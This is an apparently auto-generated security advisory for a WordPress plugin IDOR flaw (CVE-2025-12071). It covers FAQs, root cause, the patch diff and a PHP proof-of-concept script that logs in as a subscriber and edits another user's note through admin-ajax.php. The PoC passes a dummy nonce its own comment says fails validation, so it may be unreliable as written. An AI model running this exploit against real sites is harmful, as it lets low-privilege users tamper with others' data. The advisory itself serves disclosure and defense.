What is CVE-2025-12071?

CVE-2025-12071 is a medium-severity vulnerability in the Frontend User Notes plugin for WordPress, affecting versions up to and including 2.1.0. It allows authenticated users with Subscriber-level access or higher to modify notes that do not belong to them due to a lack of ownership validation.

How does the vulnerability work?

The vulnerability is exploited through the ‘funp_ajax_modify_notes’ AJAX endpoint, where the ‘noteEditId’ parameter is accepted without verifying the ownership of the note. This allows an attacker to send a request to modify or delete notes belonging to other users.

Who is affected by this vulnerability?

All users with Subscriber-level permissions and above are affected if they have access to the vulnerable plugin versions (2.1.0 and earlier). WordPress administrators using these versions should be aware of the potential for unauthorized note modifications.

How can I check if I am affected?

To check if you are affected, verify the version of the Frontend User Notes plugin installed on your WordPress site. If the version is 2.1.0 or earlier, your site is vulnerable and should be updated.

How can I fix the vulnerability?

To fix the vulnerability, update the Frontend User Notes plugin to version 2.1.1 or later, where the ownership verification check has been implemented. Regularly check for updates to ensure you have the latest security patches.

What does the CVSS score of 4.3 mean?

The CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the risk is not critical, it is significant enough to warrant attention and remediation to prevent unauthorized access and data modification.

What are the practical risks of this vulnerability?

The practical risks include unauthorized modification or deletion of user notes, which can lead to data integrity violations. Attackers could disrupt workflows, alter important notes, or delete task lists, affecting the functionality of applications relying on the plugin.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated attacker can use a crafted POST request to modify another user’s note by exploiting the lack of ownership checks. It shows the steps necessary to log in and perform the unauthorized action against a vulnerable site.

Is there a way to mitigate the risk without updating?

While the best practice is to update the plugin, you can temporarily mitigate the risk by restricting access to the AJAX endpoint or limiting user permissions. However, these are not long-term solutions and updating is strongly recommended.

How can I stay informed about vulnerabilities?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and monitor the official WordPress plugin repository for updates and advisories related to installed plugins.

What should I do if I cannot update immediately?

If immediate updating is not possible, consider disabling the Frontend User Notes plugin temporarily or restricting access to user roles that do not require the plugin’s functionality until you can apply the patch.

Where can I find more information about this vulnerability?

More information about CVE-2025-12071 can be found on the National Vulnerability Database (NVD) and the official WordPress security advisory pages. These resources provide detailed descriptions and links to patches.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12071: Frontend User Notes <= 2.1.0 – Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary Note Modification (frontend-user-notes)

CVE ID CVE-2025-12071

Plugin frontend-user-notes

Severity Medium (CVSS 4.3)

CWE 639

Vulnerable Version 2.1.0

Patched Version 2.1.1

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12071:
The Frontend User Notes WordPress plugin version 2.1.0 and earlier contains an Insecure Direct Object Reference vulnerability in its AJAX note modification handler. This flaw allows authenticated users with Subscriber-level permissions or higher to modify notes belonging to other users. The CVSS 4.3 score reflects a medium-severity authorization bypass.

Root Cause:
The vulnerability originates in the `funp_ajax_modify_notes` function within `/frontend-user-notes/includes/ajax.php`. The function accepts a user-controlled `noteEditId` parameter via POST without verifying the requesting user owns the target note. Lines 95-97 show the vulnerable code reading `$_POST[“noteEditId”]` directly into `$cur_id`. The function then converts this to `$post_id` via `absint()` but performs no ownership check before executing modification or deletion operations.

Exploitation:
An attacker with Subscriber authentication sends a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `funp_ajax_modify_notes`. The request includes a malicious `noteEditId` parameter containing the numeric ID of another user’s note. The attacker also supplies a `noteAction` parameter set to `edit` or `remove` and a `noteContent` parameter for edits. The plugin processes this request because it validates the user is logged in but does not validate note ownership.

Patch Analysis:
The patch in version 2.1.1 adds an ownership verification check. After retrieving the post object for the given `$post_id`, the patched code calls `get_post_meta($post_id, ‘_funp_single_user_id’, true)` to fetch the note’s author ID. It compares this value against the current user’s ID obtained via `funp_cur_user_id()`. If the IDs do not match, the function returns an authorization error. The patch also changes the `funp_cur_user_id()` helper function to return `absint()` instead of `esc_attr()` for type consistency.

Impact:
Successful exploitation allows authenticated low-privilege users to modify or delete any note stored by the plugin. This constitutes a data integrity violation and unauthorized data modification. Attackers could delete other users’ task lists, modify personal notes in e-learning contexts, or disrupt workflow management systems built on the plugin.

Differential between vulnerable and patched code

Code Diff

--- a/frontend-user-notes/frontend-user-notes.php
+++ b/frontend-user-notes/frontend-user-notes.php
@@ -3,7 +3,7 @@
  * Plugin Name:       Frontend User Notes
  * Plugin URI:        https://wppatch.com/plugins/
  * Description:       Allow site members and registered users to add and save personal notes from site's frontend. The notes add and update in real time using ajax. Suitable for task management, membership and e-learning sites. Fast, secure and fully customizable.
- * Version:           2.1.0
+ * Version:           2.1.1
  * Requires at least: 4.5
  * Requires PHP:      5.6
  * Author:            wpPatch
@@ -24,7 +24,7 @@
 //Define plugin path
 define('FUNP_FN_DIR', plugin_dir_path( __FILE__ ));
 define('FUNP_FN_URL', plugin_dir_url( __FILE__ ));
-define('FUNP_CUR_VERSION', '2.1.0');
+define('FUNP_CUR_VERSION', '2.1.1');
 //registration hook
 // register_activation_hook(__FILE__, 'funp_do_action_on_activation');
 // function funp_do_action_on_activation(){
--- a/frontend-user-notes/includes/ajax.php
+++ b/frontend-user-notes/includes/ajax.php
@@ -46,8 +46,8 @@
     }

     $add_date   = isset( $_POST["addDate"] ) ? sanitize_text_field( wp_unslash ( $_POST["addDate"] ) )  : null;
-    $user_id    = isset( $_POST["userId"] ) ? sanitize_text_field( wp_unslash ( $_POST["userId"] ) ) : null;
-    $post_id    = isset( $_POST["postId"] ) ? sanitize_text_field( wp_unslash ( $_POST["postId"] ) ) : null;
+    $user_id    = funp_cur_user_id();
+    $post_id    = isset( $_POST["postId"] ) ? absint($_POST["postId"]) : 0;
     $cont       = isset( $_POST["noteContent"] ) ? sanitize_textarea_field( wp_unslash ( $_POST["noteContent"] ) ) : null;

     if ( check_ajax_referer( 'funp_add_note_nonce', 'security', false ) == false ) {
@@ -60,6 +60,16 @@
         wp_send_json_error( $message );
     }

+    if ( !$user_id ) {
+        $message = __('Unauthorized. You must be logged in.', 'frontend-user-notes');
+        wp_send_json_error( $message );
+    }
+
+    if ( ! $post_id || get_post_status( $post_id ) === false ) {
+        $message = __('Invalid post ID.', 'frontend-user-notes');
+        wp_send_json_error( $message );
+    }
+
     $new_note = array(
         'post_title'    => wp_strip_all_tags( 'Note ID: ', true ),
         'post_content'  => wp_strip_all_tags( $cont, true ),
@@ -84,7 +94,7 @@
         $note_id = $inserted_note_id;
         $message = __("Note created successfully", "frontend-user-notes");
         wp_update_post([ 'ID' => esc_attr( $note_id ), 'post_title' => wp_strip_all_tags( 'Note ID: '. esc_attr( $note_id ), true ) ]);
-        wp_send_json_success( array( 'note_id' => esc_attr( $note_id ), 'message' => $message ) );
+        wp_send_json_success( array( 'note_id' => $note_id, 'message' => $message ) );
     }
 }

@@ -95,12 +105,34 @@
         wp_send_json_error( $message);
     }

-    $cur_id     = isset( $_POST["noteEditId"] ) ? sanitize_text_field( wp_unslash ( $_POST["noteEditId"] ) ) : null;
+    $post_id    = isset( $_POST["noteEditId"] ) ? absint($_POST["noteEditId"]) : 0;
     $action     = isset( $_POST["noteAction"] ) ? sanitize_text_field( wp_unslash ( $_POST["noteAction"] ) ) : null;
     $cont       = isset( $_POST["noteContent"] ) ? sanitize_textarea_field( wp_unslash ( $_POST["noteContent"] ) ) : null;
     $user_id    = funp_cur_user_id();
-
-    $post_id = absint($cur_id);
+
+    if ( !$user_id ) {
+        $message = __('Unauthorized. You must be logged in.', 'frontend-user-notes');
+        wp_send_json_error( $message );
+    }
+
+    if (!$post_id) {
+        $message = esc_html__("Invaid post id.", "frontend-user-notes");
+        wp_send_json_error( $message );
+    }
+
+    // Check if post exists
+    $post = get_post($post_id);
+
+    if (!$post || $post->post_type !== funp_registered_posttype_name() ) {
+        $message = esc_html__("Post not found or not a valid post type.", "frontend-user-notes");
+        wp_send_json_error( $message );
+    }
+
+    $cur_note_author = absint( get_post_meta( $post_id, '_funp_single_user_id', true ) );
+
+    if ( ! $cur_note_author || $cur_note_author !== $user_id ) {
+        wp_send_json_error( __( 'You are not authorized to modify this note. Reload the page and try again.', 'frontend-user-notes' ) );
+    }

     if( $action === esc_html("remove") ){
         if ( check_ajax_referer( 'funp_note_action_nonce', 'security', false ) == false ) {
@@ -108,19 +140,6 @@
             wp_send_json_error( $message );
         }

-        if (!$post_id) {
-            $message = esc_html__("Invaid post id.", "frontend-user-notes");
-            wp_send_json_error( $message );
-        }
-
-        // Check if post exists
-        $post = get_post($post_id);
-
-        if (!$post || $post->post_type !== funp_registered_posttype_name() ) {
-            $message = esc_html__("Post not found or not a valid post type.", "frontend-user-notes");
-            wp_send_json_error( $message );
-        }
-
         // Delete the post
         $delete = wp_delete_post($post_id, false);

--- a/frontend-user-notes/includes/main.php
+++ b/frontend-user-notes/includes/main.php
@@ -221,7 +221,7 @@
     if( ! $current_user_id || $current_user_id < 1 ) {
         return false;
     }
-    return esc_attr( $current_user_id );
+    return absint( $current_user_id );
 }

 /*

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12071 - Frontend User Notes <= 2.1.0 - Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary Note Modification

<?php

$target_url = 'https://vulnerable-site.com';
$username = 'attacker_subscriber';
$password = 'attacker_password';
$target_note_id = 123; // ID of note belonging to another user

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);

// Check if login succeeded by looking for dashboard redirect
if (strpos($response, 'Dashboard') === false && strpos(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL), 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Craft exploit request to modify another user's note
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'funp_ajax_modify_notes',
    'noteEditId' => $target_note_id,
    'noteAction' => 'edit',
    'noteContent' => 'Modified by attacker via IDOR',
    'security' => 'dummy_nonce' // Nonce validation fails but ownership check is missing
]));

$ajax_response = curl_exec($ch);
curl_close($ch);

// Parse JSON response
$result = json_decode($ajax_response, true);

if (isset($result['success']) && $result['success'] === true) {
    echo "[SUCCESS] Note ID $target_note_id modified. Vulnerability confirmed.n";
    echo "Response: " . print_r($result, true);
} else {
    echo "[FAILED] Exploit unsuccessful or patched.n";
    echo "Response: " . $ajax_response;
}

?>

Frequently Asked Questions

What is CVE-2025-12071?
Overview of the vulnerability
CVE-2025-12071 is a medium-severity vulnerability in the Frontend User Notes plugin for WordPress, affecting versions up to and including 2.1.0. It allows authenticated users with Subscriber-level access or higher to modify notes that do not belong to them due to a lack of ownership validation.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability is exploited through the ‘funp_ajax_modify_notes’ AJAX endpoint, where the ‘noteEditId’ parameter is accepted without verifying the ownership of the note. This allows an attacker to send a request to modify or delete notes belonging to other users.
Who is affected by this vulnerability?
Impacted user roles and versions
All users with Subscriber-level permissions and above are affected if they have access to the vulnerable plugin versions (2.1.0 and earlier). WordPress administrators using these versions should be aware of the potential for unauthorized note modifications.
How can I check if I am affected?
Identifying vulnerable installations
To check if you are affected, verify the version of the Frontend User Notes plugin installed on your WordPress site. If the version is 2.1.0 or earlier, your site is vulnerable and should be updated.
How can I fix the vulnerability?
Steps to mitigate the issue
To fix the vulnerability, update the Frontend User Notes plugin to version 2.1.1 or later, where the ownership verification check has been implemented. Regularly check for updates to ensure you have the latest security patches.
What does the CVSS score of 4.3 mean?
Understanding the severity rating
The CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the risk is not critical, it is significant enough to warrant attention and remediation to prevent unauthorized access and data modification.
What are the practical risks of this vulnerability?
Potential impact on data integrity
The practical risks include unauthorized modification or deletion of user notes, which can lead to data integrity violations. Attackers could disrupt workflows, alter important notes, or delete task lists, affecting the functionality of applications relying on the plugin.
What does the proof of concept demonstrate?
Illustrating the exploitation method
The proof of concept illustrates how an authenticated attacker can use a crafted POST request to modify another user’s note by exploiting the lack of ownership checks. It shows the steps necessary to log in and perform the unauthorized action against a vulnerable site.
Is there a way to mitigate the risk without updating?
Temporary workarounds
While the best practice is to update the plugin, you can temporarily mitigate the risk by restricting access to the AJAX endpoint or limiting user permissions. However, these are not long-term solutions and updating is strongly recommended.
How can I stay informed about vulnerabilities?
Monitoring for security updates
To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and monitor the official WordPress plugin repository for updates and advisories related to installed plugins.
What should I do if I cannot update immediately?
Interim security measures
If immediate updating is not possible, consider disabling the Frontend User Notes plugin temporarily or restricting access to user roles that do not require the plugin’s functionality until you can apply the patch.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-12071 can be found on the National Vulnerability Database (NVD) and the official WordPress security advisory pages. These resources provide detailed descriptions and links to patches.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations